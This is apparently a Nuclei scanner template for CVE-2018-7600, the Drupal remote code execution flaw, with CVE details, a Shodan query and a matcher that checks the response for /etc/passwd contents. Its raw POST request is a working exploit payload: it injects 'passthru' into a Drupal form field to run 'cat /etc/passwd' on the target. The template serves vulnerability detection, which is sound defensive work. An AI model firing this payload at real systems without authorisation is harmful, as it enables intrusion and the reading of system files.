id: CVE-2018-7600 info: name: Drupal - Remote Code Execution author: pikpikcu severity: critical description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. reference: - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 - https://www.drupal.org/sa-core-2018-002 - https://groups.drupal.org/security/faq-2018-002 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 metadata: max-request: 1 shodan-query: http.component:"drupal" tags: cve,cve2018,drupal,rce,kev,cisa,vulhub http: - raw: - | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: {{Hostname}} Accept: application/json Referer: {{Hostname}}/user/register X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" matchers-condition: and matchers: - type: word words: - "application/json" part: header - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 # Enhanced by mp on 2022/05/13